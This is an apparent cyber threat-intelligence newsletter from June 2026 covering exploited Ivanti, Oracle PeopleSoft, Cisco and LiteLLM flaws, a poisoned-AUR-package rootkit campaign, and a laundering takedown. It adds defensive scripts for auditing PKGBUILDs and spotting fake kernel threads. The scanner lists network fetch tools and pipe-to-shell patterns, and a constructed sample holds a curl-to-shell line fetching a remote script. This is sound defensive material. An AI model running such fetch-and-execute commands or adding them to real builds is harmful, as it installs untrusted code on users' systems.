The Lyceum: Cyber Intelligence Daily — Jun 13, 2026
Past 3 Days — June 13, 2026
The Big Picture
This was a fast week, and the speed is the story. A CVSS 10.0 Ivanti Sentry flaw went from public proof-of-concept to backdoored gateways in about 40 hours — and CISA's first-ever three-day federal patch deadline expires tomorrow, Sunday June 14. ShinyHunters had already been living inside more than 100 universities' Oracle PeopleSoft systems for two weeks before Oracle even knew the bug existed. And somewhere between 400 and 1,500 Arch Linux packages were quietly poisoned with a rootkit that hides from your own process monitors. The connective tissue: attackers are no longer racing patches — they're beating them, and they're doing it inside the infrastructure nobody watches closely.
What Just Dropped
- CVE-2026-10520 — Ivanti Sentry (10.5.x, 10.6.x, 10.7.x): actively exploited, patched June 9. KEV maturity 2 (operational). Unauthenticated OS command injection giving root via a single POST request; federal deadline June 14.
- CVE-2026-35273 — Oracle PeopleSoft Enterprise PeopleTools 8.61/8.62: actively exploited as a zero-day, no patch yet (mitigations only). KEV maturity 3 (commoditized), ransomware-linked. Unauthenticated RCE over the internet.
- CVE-2026-20245 — Cisco Catalyst SD-WAN Manager: actively exploited, KEV maturity 2 (operational). Crafted file upload escalates low privileges to root; deadline June 23.
- CVE-2026-11645 — Google Chromium V8: actively exploited, patched. KEV maturity 2. Out-of-bounds read/write enabling sandbox escape; deadline June 23.
- CVE-2026-42271 — BerriAI LiteLLM: actively exploited, KEV maturity 2. Command injection any authenticated user can trigger; deadline June 22.
- Atomic Arch rootkit: AUR supply-chain campaign hijacking orphaned packages to drop a credential stealer and eBPF rootkit. Actively spreading since June 11, with a second wave on June 12.
This Week's Stories
Ivanti Sentry CVE-2026-10520: CVSS 10.0, Actively Backdoored, Patch by Tomorrow
If your organization runs Ivanti Sentry, assume you are already compromised.
CVE-2026-10520 lets an unauthenticated remote attacker run operating-system commands as root with a single crafted POST request. No login. No user interaction. Ivanti shipped patches on June 9 (Sentry R10.5.2, R10.6.2, R10.7.1), and CISA added the flaw to its Known Exploited Vulnerabilities catalog on June 11, requiring federal agencies to patch by June 14 under the newly issued Binding Operational Directive 26-04 — the agency's first-ever three-day mandate (Windows News). Attackers backdoored gateways within roughly 40 hours of a public proof-of-concept, and Shadowserver's guidance is blunt: any unpatched instance is likely already compromised (TechTimes). Security Affairs confirmed exploitation began shortly after the patch dropped (Security Affairs).
BOD 26-04 swaps flat CVSS deadlines for a risk-based model, and Ivanti Sentry is its first live test.
What failure looks like is familiar — CISA has now flagged 35 Ivanti vulnerabilities as actively exploited since 2020, twelve of them in ransomware campaigns (TechTimes). The signal to watch: whether the three-day clock produces faster real-world patching than the old system, or just faster paperwork.
ShinyHunters Robbed 100+ Universities With an Oracle Zero-Day Nobody Knew Existed
The breach isn't the scary part. The timeline is. ShinyHunters was inside university systems for two weeks before Oracle knew the vulnerability existed.
Mandiant and the Google Threat Intelligence Group attributed an active compromise-and-extortion campaign to UNC6240 — the cluster better known as ShinyHunters — targeting Oracle PeopleSoft. Activity ran from May 27 to June 9, predating Oracle's June 10 advisory, which makes CVE-2026-35273 (CVSS 9.8, unauthenticated RCE over the internet) a zero-day at the time of exploitation (Google Cloud). Google notified more than 100 organizations with exposed internet-facing systems; 68% were in higher education (CSO Online). The University of Nottingham confirmed a cyber incident on June 11, with The Record reporting ShinyHunters' claim of roughly 455,000 unique email addresses plus names, passport numbers, disability data, and fee records (The Record).
PeopleSoft is the boiler room of an institution — payroll, HR, student records, billing. A reliable path in means the blast radius is exactly the regulated data that triggers lawsuits. Oracle still hasn't shipped a patch and is urging customers to apply mitigations and lock down internet-facing PeopleSoft endpoints now (Technology.org). Watch whether the victim list spreads past higher ed — the group has signaled its extortion outreach is only beginning.
"Atomic Arch": 400–1,500 Linux Packages Poisoned With a Rootkit That Hides From Your Tools
This attack didn't trick anyone into installing something shady. It inherited trust built over years.
Researchers dubbed it "Atomic Arch." Starting around June 11, attackers systematically adopted orphaned AUR packages — legitimate projects abandoned by their maintainers — through the Arch User Repository's standard ownership process, then modified the build scripts. Sonatype found the poisoned PKGBUILDs pulling a malicious npm dependency at install time, carrying a Linux payload for credential harvesting, anti-debugging, and exfiltration (Sonatype). The malware disguises its processes as legitimate kernel threads to dodge ps and htop, and deploys an eBPF rootkit if it runs as root (The Hacker News). BleepingComputer initially counted more than 400 packages; later reporting put the total near 1,500 (BleepingComputer). LWN noted the same orphaned-package trust gap that long-lived community repos keep stumbling into (LWN).
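Arch's packaging guidelines expect every input to be declared in `source=()` and pinned by checksums, so a PKGBUILD whose build-phase functions reach out to npm, Bun, curl or a pipe-to-shell at install time is exactly the pattern described above. The following heuristic scanner is an added example, not code from the original report or from any of the researchers cited; the two PKGBUILDs it checks are constructed samples (package name, URLs and the `example-helper-pkg` dependency are placeholders, not real packages), and the command list is an assumption about what is worth flagging, not an AUR policy.

```python
import re
from typing import Dict, List, Tuple

# Commands that fetch from the network or run a package manager. Arch expects all
# sources in source=() with checksums, so any of these inside prepare/build/
# package functions deserves a manual look (assumed heuristic, not AUR policy).
NETWORK_CMDS = ("curl", "wget", "npm", "npx", "bun", "bunx", "pip", "git clone")
# Fetched content handed straight to an interpreter, or decoded before use.
EXEC_PIPE = re.compile(r"\|\s*(ba)?sh\b|\beval\b|base64\s+(-d|--decode)")
FUNC_START = re.compile(r"^\s*(prepare|build|check|package(?:_[\w-]+)?)\s*\(\)\s*\{")

def split_functions(pkgbuild: str) -> Dict[str, List[Tuple[int, str]]]:
    """Return {function name: [(line number, line text), ...]} for each shell
    function in the PKGBUILD, using brace depth to find where each one ends."""
    funcs: Dict[str, List[Tuple[int, str]]] = {}
    name, depth = None, 0
    for lineno, line in enumerate(pkgbuild.splitlines(), start=1):
        if name is None:
            m = FUNC_START.match(line)
            if m:
                name, depth = m.group(1), 1
                funcs[name] = []
            continue
        funcs[name].append((lineno, line))
        depth += line.count("{") - line.count("}")
        if depth <= 0:
            name = None
    return funcs

def audit_pkgbuild(pkgbuild: str) -> List[Tuple[int, str, str]]:
    """Flag lines in build-phase functions that fetch or execute remote content.
    Returns (line number, function name, reason); an empty list means nothing flagged."""
    findings = []
    for fname, lines in split_functions(pkgbuild).items():
        for lineno, line in lines:
            code = line.split("#", 1)[0]  # ignore trailing shell comments
            for cmd in NETWORK_CMDS:
                if re.search(r"(^|[\s;&|(])" + re.escape(cmd) + r"\b", code):
                    findings.append((lineno, fname, f"network/package-manager call: {cmd}"))
                    break
            if EXEC_PIPE.search(code):
                findings.append((lineno, fname, "fetched content piped to a shell or decoded"))
    return findings

# Constructed sample: a PKGBUILD that only builds what source=() declared.
SAMPLE_CLEAN = """\
pkgname=hello-tool
pkgver=1.2.0
source=("https://example.invalid/hello-tool-$pkgver.tar.gz")
sha256sums=('SKIP')
build() {
  cd "$srcdir/$pkgname-$pkgver"
  make
}
package() {
  cd "$srcdir/$pkgname-$pkgver"
  make DESTDIR="$pkgdir" install
}
"""

# Constructed sample: same package after a hostile update adds an install-time
# npm dependency and a curl-to-shell step (placeholder names and URLs).
SAMPLE_SUSPECT = """\
pkgname=hello-tool
pkgver=1.2.1
source=("https://example.invalid/hello-tool-$pkgver.tar.gz")
sha256sums=('SKIP')
build() {
  cd "$srcdir/$pkgname-$pkgver"
  npm install --no-save example-helper-pkg  # constructed: install-time dependency
  make
}
package() {
  cd "$srcdir/$pkgname-$pkgver"
  make DESTDIR="$pkgdir" install
  curl -fsSL https://example.invalid/setup.sh | sh
}
"""

if __name__ == "__main__":
    for label, text in (("clean", SAMPLE_CLEAN), ("suspect", SAMPLE_SUSPECT)):
        print(label)
        for lineno, fname, reason in audit_pkgbuild(text):
            print(f"  line {lineno} in {fname}(): {reason}")
```

Point it at the PKGBUILD of any package you pulled on or after June 11 (for example by reading the file and calling `audit_pkgbuild` on its contents). A hit is a prompt to read the function by hand, not a verdict: some legitimate PKGBUILDs do shell out to npm during build, but a diff that newly introduces such a call after a maintainer change is the pattern to treat as hostile.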
If you installed or updated any AUR package on or after June 11, treat the system as suspect. If the package ran as root, reinstall from trusted media — there's no way to trust a machine with an eBPF rootkit on it. A second wave on June 12 added Bun-based install paths, so the count is still climbing. The signal to watch: whether AUR overhauls its orphaned-package adoption policy, or whether the next attacker simply repeats the playbook.
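The "disguised as a kernel thread" trick relies on what ps and htop display: they bracket a name when /proc/PID/cmdline is empty, and a user process can empty its own argv and rename itself to kworker/… with prctl. What it cannot do is set the PF_KTHREAD flag the kernel records in /proc/PID/stat, give itself kthreadd (pid 2) as a parent, or make its /proc/PID/exe link disappear. The triage script below is an added example, not code from the original report; it checks those three kernel-owned facts against the appearance. The three stat lines are constructed samples (the flag values are typical ones, the pids and the `/tmp/.x/payload` path are placeholders), and the list of kernel-thread name prefixes is an assumption drawn from common kernel thread names.

```python
import os
import re
from typing import Dict, List, Optional

PF_KTHREAD = 0x00200000  # kernel-owned flag in /proc/PID/stat; userspace cannot set it

# Names real kernel threads carry (assumed list of common prefixes); a user
# process adopting one of them is the masquerade the report describes.
KTHREAD_NAMES = re.compile(
    r"^(kworker/|ksoftirqd/|kthreadd$|migration/|rcu_|kswapd|kcompactd|khugepaged$|cpuhp/)"
)

def parse_stat(stat_line: str) -> Dict[str, object]:
    """Parse /proc/PID/stat. comm sits in parentheses and may itself contain
    spaces or ')', so split on the last ')' rather than on whitespace."""
    head, _, tail = stat_line.rpartition(")")
    pid, _, comm = head.partition("(")
    fields = tail.split()
    # fields after ')': state ppid pgrp session tty_nr tpgid flags ...
    return {"pid": int(pid), "comm": comm, "state": fields[0],
            "ppid": int(fields[1]), "flags": int(fields[6])}

def classify(stat_line: str, cmdline: bytes, exe_target: Optional[str]) -> Dict[str, object]:
    """Compare how a process presents itself with what the kernel records about it."""
    st = parse_stat(stat_line)
    is_kthread = bool(st["flags"] & PF_KTHREAD)
    looks_like_kthread = cmdline.strip(b"\x00") == b"" or bool(KTHREAD_NAMES.match(st["comm"]))
    if st["state"] == "Z":
        looks_like_kthread = False  # zombies also have an empty cmdline and no exe
    reasons: List[str] = []
    if is_kthread:
        verdict = "kernel-thread"
    elif looks_like_kthread:
        verdict = "masquerading"
        reasons.append("PF_KTHREAD not set")
        if exe_target is not None:
            reasons.append(f"exe resolves to {exe_target}")
        if st["ppid"] not in (0, 2):
            reasons.append(f"parent is pid {st['ppid']}, not kthreadd")
    else:
        verdict = "user-process"
    return {"pid": st["pid"], "comm": st["comm"], "verdict": verdict, "reasons": reasons}

def scan_proc() -> List[Dict[str, object]]:
    """Walk /proc on a live Linux host and return processes that present as
    kernel threads without the kernel's PF_KTHREAD flag."""
    suspects = []
    for entry in os.listdir("/proc"):
        if not entry.isdigit():
            continue
        try:
            with open(f"/proc/{entry}/stat") as f:
                stat_line = f.read()
            with open(f"/proc/{entry}/cmdline", "rb") as f:
                cmdline = f.read()
            try:
                exe = os.readlink(f"/proc/{entry}/exe")
            except OSError:
                exe = None  # real kernel threads have no exe link
            result = classify(stat_line, cmdline, exe)
        except OSError:
            continue  # process exited mid-scan or entry not readable
        if result["verdict"] == "masquerading":
            suspects.append(result)
    return suspects

# Constructed samples, truncated after the fields the parser uses.
KWORKER_STAT = "123 (kworker/u8:2) I 2 0 0 0 -1 69238880 0 0 0 0 0 0 0 0 0 20 0 1 0 3 0 0"   # genuine
FAKE_STAT = "4242 (kworker/u8:2) S 1 4242 4242 0 -1 4194560 0 0 0 0 0 0 0 0 0 20 0 1 0 9 0 0"  # renamed user process
BASH_STAT = "777 (bash) S 500 777 777 34816 777 4194304 0 0 0 0 0 0 0 0 0 20 0 1 0 5 0 0"   # ordinary shell

if __name__ == "__main__":
    for s in scan_proc():
        print(f"pid {s['pid']} ({s['comm']}): {'; '.join(s['reasons'])}")
```

Run it as root so every /proc/PID/exe link is readable. A hit with all three reasons is strong evidence of the masquerade; an empty result is not evidence of a clean host, because an eBPF rootkit that filters /proc reads can hide from this check as easily as from htop, which is why the advice above is to reinstall from trusted media once one is suspected.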
Authorities Dismantle "AudiA6," a Crypto-Laundering Service Tied to Ransomware Cashouts
Every ransomware story has an unglamorous third act: the money has to get clean. Europol, the FBI, and partners say they dismantled AudiA6, a cryptocurrency laundering service that allegedly moved more than $380 million across 11 countries and was linked to over 15 ransomware investigations (BleepingComputer). Investigators described an industrial-scale operation running on thousands of fraudulent exchange accounts opened with stolen identities, acting as a central laundering hub from 2022 to 2025. An earlier arrest in Poland of a Ukrainian national linked to the service helped crack it open.
You don't have to arrest every burglar if you can close the pawn shop. Infrastructure takedowns are one of the few moves that slow many criminal groups at once. The honest question is whether this bends the curve or just reroutes it — ransomware affiliates have a long history of migrating to the next mixer within weeks. The signal to watch: wallet seizures, indictments, or named affiliate fallout would mean law enforcement hit the financial plumbing, not just the branding.
⚡ What Most People Missed
Cisco's SD-WAN bug looks less like a one-off and more like a campaign: Cisco warned that CVE-2026-20245 in Catalyst SD-WAN Manager is being exploited to escalate to root via a crafted file upload, and it learned of the abuse from Mandiant — not its own scans. With multiple Catalyst SD-WAN flaws tied to active attacks this year, this reads as systematic pressure on the management plane of widely deployed network gear, not isolated bug hunting.
A second Drupal SQL-injection path just surfaced: An Exploit-DB entry for error-based SQL injection in Drupal Core 10.5.5 landed this week — distinct from the CVE-2026-9082 blind-injection path this newsletter has tracked since late May. Teams that patched the first bug may assume the door is shut; a second technique against a current release means it may still be open. Still one Exploit-DB submission awaiting vendor confirmation.
Russian hackers exploited a critical Office bug within days of disclosure: CVE-2026-21509, a Microsoft Office zero-day patched out-of-band, is already being weaponized — and CERT-UA has tied it to APT28 (UAC-0001), Russia's GRU-linked cluster, against Ukrainian and EU targets. Because it blends ordinary Office file delivery with a fresh exploit, expect it folded into broader phishing toolchains the way Equation Editor bugs once were.
Two MUST-COVER headlines are out of scope on freshness. The "Indonesia central bank / Conti" BleepingComputer report dates to January 2022, not 2026 — a real story, but not a 72-hour one. And the CL0P "top June headlines" roundup is situational reporting on ongoing extortion activity rather than a new development. Flagging both so readers aren't misled by recycled framing.
From the Foreign Press
CERT-UA Documents UAC-0247 Targeting Hospitals, Local Government, and FPV Drone Operators
Ukraine's national CERT published an advisory detailing the cluster it tracks as UAC-0247 (also UAC-0244) running a coordinated campaign against Ukrainian hospitals, local government bodies, and operators of FPV drones — the small first-person-view aircraft now central to the front lines. The choice of targets is the tell: it pairs civilian healthcare and municipal systems with the specific military-adjacent drone-operator community, suggesting an intelligence-collection effort aimed at both wartime logistics and battlefield capability. For Western defenders, the pattern matters because UAC clusters that begin in Ukraine have repeatedly pivoted into NATO supply chains within weeks. Source: CERT-UA Advisory #6288271 — Ukrainian. No English-language coverage confirmed at time of publication.
CERT-UA: UAC-0255 Impersonates CERT-UA Itself to Deliver AGEWHEEZE Malware
In a campaign tracked as CERT-UA#21075, the cluster UAC-0255 sent phishing messages spoofed to appear as official notifications from CERT-UA, directing recipients to password-protected ZIP archives that deploy a tool the agency calls AGEWHEEZE. Using a country's own cyber-defense agency as the lure to compromise that country's officials is a particularly cynical move — and an effective one, because it weaponizes the exact channel users are trained to trust. If this technique surfaces outside Ukraine, every national CERT becomes a brand worth spoofing, and security-awareness programs quietly need a new module on verifying official guidance. Source: CERT-UA Advisory #6288047 — Ukrainian. No English-language coverage confirmed at time of publication.
📅 What to Watch
- If federal agencies miss tomorrow's June 14 Ivanti deadline at scale, the ransomware crews with a 40-hour head start will have had a clean run through government networks before BOD 26-04 ever proves its worth.
- If ShinyHunters' victim list expands beyond higher education, it signals the PeopleSoft zero-day is now a general-purpose initial-access tool, not an education-sector campaign — and the extortion economy just added a new mass vector.
- If the AUR package count keeps climbing past the current cluster, this was never a cleanup event but the early stage of a trust collapse in community Linux packaging.
- If the AudiA6 takedown produces wallet seizures or named affiliate indictments, law enforcement hit the financial plumbing — and you'll see it in which leak sites suddenly go quiet.
- If CERT-UA's UAC-0255 CERT-impersonation tactic appears in non-Ukrainian phishing within two weeks, the trust users place in official advisories becomes its own attack surface.
The Closer
A boiler room emptied while the building owner slept; a Linux rootkit cosplaying as a kernel thread so your own htop waves it through; and a $380 million money-laundromat named, for reasons known only to its operators, after a midsize German sedan. The funniest part is that Google is now suing a Chinese smishing crew for using Gemini to write phishing kits — which means the year's defining cyber genre may be vendors getting robbed with their own products. Patch the Ivanti box before Sunday; the clock isn't theoretical.
Forward this to the one friend who still runs an AUR package as root and tell them it's important — because it is.
⚡ EDGE Signals
The following signals appeared in the adversarial edge sweep but were not carried forward in the primary synthesis:
- TechRepublic notes that CISA has added a two‑year‑old Oracle WebLogic Server vulnerability to its Known Exploited Vulnerabilities (KEV) catalog, ordering U.S. federal agencies to patch. The bug, in WebLogic's HTTP server component, allows unauthenticated remote code execution (RCE) and has a
- The Cisco SD-WAN KEV is the specific item to watch: if CL0P or an affiliated initial-access broker has been sitting on a Cisco SD-WAN exploit, the federal patching deadline creates a narrow window where government networks are still exposed while the advisory is public. The GovTech item is a hig
- Source for the Office zero-day item above: Russian hackers exploited a critical Office bug within days of disclosure | CSO Online — https://www.csoonline.com/article/4127181/russian-hackers-exploited-a-critical-office-bug-within-days-of-disclosure.html